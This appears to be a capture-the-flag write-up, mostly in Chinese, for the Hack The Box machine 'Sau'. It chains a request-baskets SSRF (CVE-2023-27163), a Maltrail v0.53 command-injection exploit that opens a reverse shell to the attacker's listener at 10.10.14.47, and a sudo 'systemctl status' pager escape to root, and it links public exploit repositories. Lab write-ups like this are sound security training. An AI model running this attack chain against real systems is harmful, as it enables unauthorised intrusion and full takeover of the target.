Sau - HackMD

# Sau ## 1.nmap scan ![image](https://hackmd.io/_uploads/H1nFRgDVa.png) http://10.10.11.224:55555/ 連接網頁發現Basket Request google Search "Basket Request" ``` ./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80 ``` 連接新建的網頁發現Powered by Maltrail (v0.53) google Search "Maltrail (v0.53)" git clone https://github.com/spookier/Maltrail-v0.53-Exploit ![image](https://hackmd.io/_uploads/rymnRlv46.png) ## 2.Reverse shell 發現網頁界面可設置轉發url ![image](https://hackmd.io/_uploads/HyMZ8QDNp.png) [kali] nc -nvlp 9991 ``` python3 exploit.py 10.10.14.47 9991 http://10.10.11.224:55555/oz6dumj ``` ![image](https://hackmd.io/_uploads/r1zHU7D4p.png) 成功反連 ![image](https://hackmd.io/_uploads/SkgMOQDNT.png) ## 3.提權 sudo -l 發現User puma may run the following commands on sau: (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service ![image](https://hackmd.io/_uploads/ryzFd7DE6.png) 進入less狀態時輸入!sh指令 ![image](https://hackmd.io/_uploads/rJ_OFXwET.png) cat root/root.txt(flag2) cat home/puma/user.txt(flag1) --------------------------------- maybe easy more... github Sau htb poc https://github.com/SethJGibson/Hummingbird-Maltrail-RCE-PoC github Sau RCE-hackthebox https://github.com/M11K33L/SAU-Machine-RCE-hackthebox